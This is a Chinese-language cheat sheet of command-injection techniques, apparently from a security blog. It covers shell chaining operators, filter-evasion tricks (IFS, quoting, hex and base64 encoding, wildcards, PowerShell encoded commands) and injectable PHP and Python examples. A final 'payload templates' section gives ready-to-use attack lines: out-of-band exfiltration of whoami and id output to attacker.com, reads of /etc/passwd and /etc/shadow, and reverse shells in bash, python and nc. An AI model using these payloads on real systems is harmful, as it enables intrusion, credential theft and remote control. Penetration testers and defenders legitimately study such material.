命令注入与拼接技巧速查

所有内容仅用于合法授权的安全研究与学习

一、基础拼接符号#

1.1 Linux / Bash#

符号	名称	行为	示例
`;`	分号	顺序执行，不管前命令是否成功	`cmd1 ; cmd2`
`&&`	逻辑与	前成功（返回0）才执行后	`cmd1 && cmd2`
`\|\|`	逻辑或	前失败（非0）才执行后	`cmd1 \|\| cmd2`
`\|`	管道	前的 stdout 作为后的 stdin	`cmd1 \| cmd2`
`&`	后台	前台启动后台进程，同时继续执行	`cmd1 & cmd2`
`\n` / `%0a`	换行符	等同于 `;`，URL编码场景常用	`cmd1%0acmd2`
`\r\n` / `%0d%0a`	回车换行	Windows/HTTP 场景下的换行	`cmd1%0d%0acmd2`

1.2 Windows CMD#

符号	行为	示例
`&`	顺序执行	`cmd1 & cmd2`
`&&`	前成功才执行后	`cmd1 && cmd2`
`\|\|`	前失败才执行后	`cmd1 \|\| cmd2`
`\|`	管道	`cmd1 \| cmd2`
`%0a`	URL编码换行（适用于HTTP参数传入cmd.exe的场景）	`cmd1%0acmd2`

1.3 PowerShell#

1
cmd1 ; cmd2          # 顺序执行
2
cmd1 && cmd2         # 前成功才执行（PS 7+）
3
cmd1 || cmd2         # 前失败才执行（PS 7+）
4
cmd1 | cmd2          # 管道
5
cmd1 & { cmd2 }      # 调用运算符

二、命令替换（Linux）#

命令替换用于将一个命令的输出嵌入另一个命令中：

1
# 反引号（旧式写法）
2
echo `whoami`
3
echo `cat /etc/passwd`
4

5
# $() 写法（推荐，可嵌套）
6
echo $(whoami)
7
echo $(cat /etc/passwd)
8

9
# 嵌套使用
10
echo $(echo $(id))
11

12
# 在赋值中使用
13
x=$(id); echo $x

三、空格绕过技巧#

当应用过滤了空格字符时：

1
# ${IFS} — 内部字段分隔符，默认含空格/tab/换行
2
cat${IFS}/etc/passwd
3
cat${IFS%?}/etc/passwd     # 去掉最后一个字符，还是空格
4

5
# $IFS$9 — 常用变体
6
cat$IFS$9/etc/passwd
7

8
# Tab 字符（%09）
9
cat%09/etc/passwd
10

11
# 花括号（Brace Expansion）
12
{cat,/etc/passwd}
13

14
# 重定向绕过
15
cat</etc/passwd
16
cat<>/etc/passwd
17

18
# $'\x20' 表示空格的十六进制
19
X=$'\x20'; cat${X}/etc/passwd

四、关键字过滤绕过#

4.1 字符串拼接#

1
# 单引号插入（不影响字符串内容）
2
c'a't /etc/passwd
3
c''a''t /etc/passwd
4

5
# 双引号插入
6
c"a"t /etc/passwd
7
ca"t" /etc/passwd
8

9
# 反斜杠转义（对shell无意义但绕过简单过滤）
10
ca\t /etc/passwd
11
/bin/ca\t /etc/passwd
12

13
# 变量拼接
14
a=ca;b=t;$a$b /etc/passwd
15
X=ca;Y=t;$X$Y /etc/passwd
16

17
# 环境变量切片拼接
18
echo ${PATH:0:1}    # 取 PATH 第一个字符（通常是 /）
19
${PATH:0:1}etc${PATH:0:1}passwd

4.2 编码绕过#

1
# 十六进制编码
2
$(printf '\x63\x61\x74') /etc/passwd     # cat
3
$'\x63\x61\x74' /etc/passwd
4

5
# 八进制编码
6
$(printf '\143\141\164') /etc/passwd     # cat
7

8
# base64 解码执行
9
echo "d2hvYW1p" | base64 -d | bash       # whoami
10
`echo "d2hvYW1p" | base64 -d`
11

12
# rev 反转字符串
13
echo "tac" | rev                          # cat
14
$(rev<<<tac) /etc/passwd

4.3 通配符绕过#

1
# ? 匹配单个字符
2
/???/??t /etc/passwd          # /bin/cat
3
/???/b??h                     # /bin/bash
4
/?i?/??t /etc/passwd
5

6
# * 匹配任意字符
7
/bin/c*t /etc/passwd
8
/bin/ca* /etc/passwd
9

10
# 字符类
11
/bin/[c]at /etc/passwd
12
/[b]in/cat /etc/passwd

4.4 路径绕过#

1
# 绝对路径代替命令名
2
/bin/cat /etc/passwd
3
/usr/bin/id
4

5
# 环境变量中提取路径字符
6
${HOME:0:1}           # / (如果HOME=/home/user)
7
${SHELL:0:1}          # /
8

9
# 利用现有路径字符构造新路径
10
echo $SHELL           # /bin/bash
11
echo ${SHELL%%bash}   # /bin/
12
# 利用切片拼接 /bin/cat

五、过滤关键字符的绕过#

5.1 过滤了 `/`#

1
# 使用变量存储 /
2
SLASH=/; ${SLASH}bin${SLASH}cat ${SLASH}etc${SLASH}passwd
3
echo ${HOME} | cut -c1   # 取 HOME 的第一个字符 /
4

5
# 利用 cd + 相对路径
6
cd /etc; cat passwd
7

8
# ${PATH:0:1}
9
${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd

5.2 过滤了 `.`#

1
# 用 source 代替 .
2
source script.sh
3

4
# 用绝对路径避免相对路径中的 .

5.3 过滤了引号#

1
# 使用 $() 代替
2
cat $(echo /etc/passwd)
3

4
# 变量赋值不需要引号
5
x=/etc/passwd; cat $x

5.4 过滤了括号 `()`#

1
# 不用括号的命令替换（反引号）
2
echo `id`
3
x=`cat /etc/passwd`
4

5
# 大括号（调用函数时也可用）
6
{id}

5.5 过滤了 `cat`#

1
# 替代命令
2
tac /etc/passwd          # 反向输出
3
more /etc/passwd
4
less /etc/passwd
5
head /etc/passwd
6
tail /etc/passwd
7
nl /etc/passwd           # 带行号
8
strings /etc/passwd
9
od -c /etc/passwd        # 八进制dump
10
xxd /etc/passwd          # 十六进制dump
11
base64 /etc/passwd       # base64编码输出
12
rev /etc/passwd          # 反转每行字符
13

14
# 重定向读取
15
while read line; do echo $line; done < /etc/passwd
16

17
# python 读取
18
python3 -c "print(open('/etc/passwd').read())"
19
python3 -c "import sys;sys.stdout.write(open('/etc/passwd').read())"
20

21
# awk / sed
22
awk '{print}' /etc/passwd
23
sed '' /etc/passwd
24

25
# cp 到可访问路径
26
cp /etc/passwd /var/www/html/p.txt

六、Windows 特殊技巧#

6.1 命令绕过#

1
# 插入无意义字符
2
wh^o^am^i                 # ^ 是转义符，插入不影响执行
3
who"am"i
4
w"h"o"a"m"i"
5

6
# 变量延迟展开
7
set x=who
8
set y=ami
9
%x%%y%
10

11
# FOR 循环嵌套执行
12
for /f %i in ('whoami') do @echo %i

6.2 PowerShell 绕过#

1
# IEX 执行字符串
2
IEX "whoami"
3
Invoke-Expression "whoami"
4

5
# 编码执行（-EncodedCommand）
6
powershell -EncodedCommand dwBoAG8AYQBtAGkA    # base64(whoami)
7

8
# 字符拼接
9
$c = 'who' + 'ami'; Invoke-Expression $c
10

11
# 通过环境变量
12
$env:ComSpec                                    # C:\Windows\System32\cmd.exe
13
& $env:ComSpec /c whoami

七、特殊场景#

7.1 PHP system/exec 中#

1
// 参数中注入
2
system("ping " . $_GET['ip']);
3
// payload: 127.0.0.1 ; cat /etc/passwd
4
// payload: 127.0.0.1 && cat /etc/passwd
5
// payload: 127.0.0.1 | cat /etc/passwd

7.2 Python subprocess 中#

1
# 使用 shell=True 时存在注入风险
2
subprocess.call("ping " + user_input, shell=True)
3
# payload: 127.0.0.1 ; id

7.3 盲命令注入（无回显）#

1
# 时间盲注
2
ping -c 5 127.0.0.1    # 延迟5秒
3

4
# DNS带外（OOB）
5
curl http://$(whoami).attacker.com
6
ping `whoami`.attacker.com
7
nslookup `id`.attacker.com
8

9
# 写文件带外
10
whoami > /var/www/html/output.txt
11
id > /tmp/x; curl http://attacker.com/?x=$(cat /tmp/x)
12

13
# nc 反弹
14
bash -i >& /dev/tcp/attacker.com/4444 0>&1

八、过滤检测与绕过思路#

1
检测到的过滤字符 → 对应绕过方案
2

3
空格被过滤      → ${IFS}, %09, <, {cmd,arg}
4
/ 被过滤        → ${PATH:0:1}, 变量拼接, cd 切换
5
引号被过滤      → 反引号, $(), 不用引号直接用变量
6
字母被过滤      → hex编码 \x??, base64解码, 变量拼接
7
cat被过滤       → tac/more/less/head/tail/od/xxd/awk
8
括号被过滤      → 反引号 ``
9
换行被过滤      → ;, &&, ||, &
10
;被过滤         → %0a换行, &&, ||
11
数字被过滤      → $((表达式)), ${#变量}取长度当数字

九、实战 Payload 模板#

基础探测#

1
# 无回显探测（DNS）
2
;curl http://$(whoami).BURPCOLLAB/
3
;ping -c1 `id`.BURPCOLLAB
4

5
# 有回显探测
6
;id
7
;whoami
8
;cat /etc/passwd

读文件#

1
;cat /etc/passwd
2
;cat${IFS}/etc/shadow
3
;base64 /etc/passwd
4
;xxd /etc/passwd | xxd -r

反弹 Shell#

1
# bash
2
bash -i >& /dev/tcp/IP/PORT 0>&1
3
bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
4

5
# URL编码版本（GET参数中）
6
bash%20-i%20>%26%20/dev/tcp/IP/PORT%200>%261
7

8
# python
9
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
10

11
# nc
12
nc -e /bin/bash IP PORT
13
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

一、基础拼接符号#

1.1 Linux / Bash#

1.2 Windows CMD#

1.3 PowerShell#

二、命令替换（Linux）#

三、空格绕过技巧#

四、关键字过滤绕过#

4.1 字符串拼接#

4.2 编码绕过#

4.3 通配符绕过#

4.4 路径绕过#

五、过滤关键字符的绕过#

5.1 过滤了 /#

5.2 过滤了 .#

5.3 过滤了引号#

5.4 过滤了括号 ()#

5.5 过滤了 cat#

六、Windows 特殊技巧#

6.1 命令绕过#

6.2 PowerShell 绕过#

七、特殊场景#

7.1 PHP system/exec 中#

7.2 Python subprocess 中#

7.3 盲命令注入（无回显）#

八、过滤检测与绕过思路#

九、实战 Payload 模板#

基础探测#

读文件#

反弹 Shell#

5.1 过滤了 `/`#

5.2 过滤了 `.`#

5.4 过滤了括号 `()`#

5.5 过滤了 `cat`#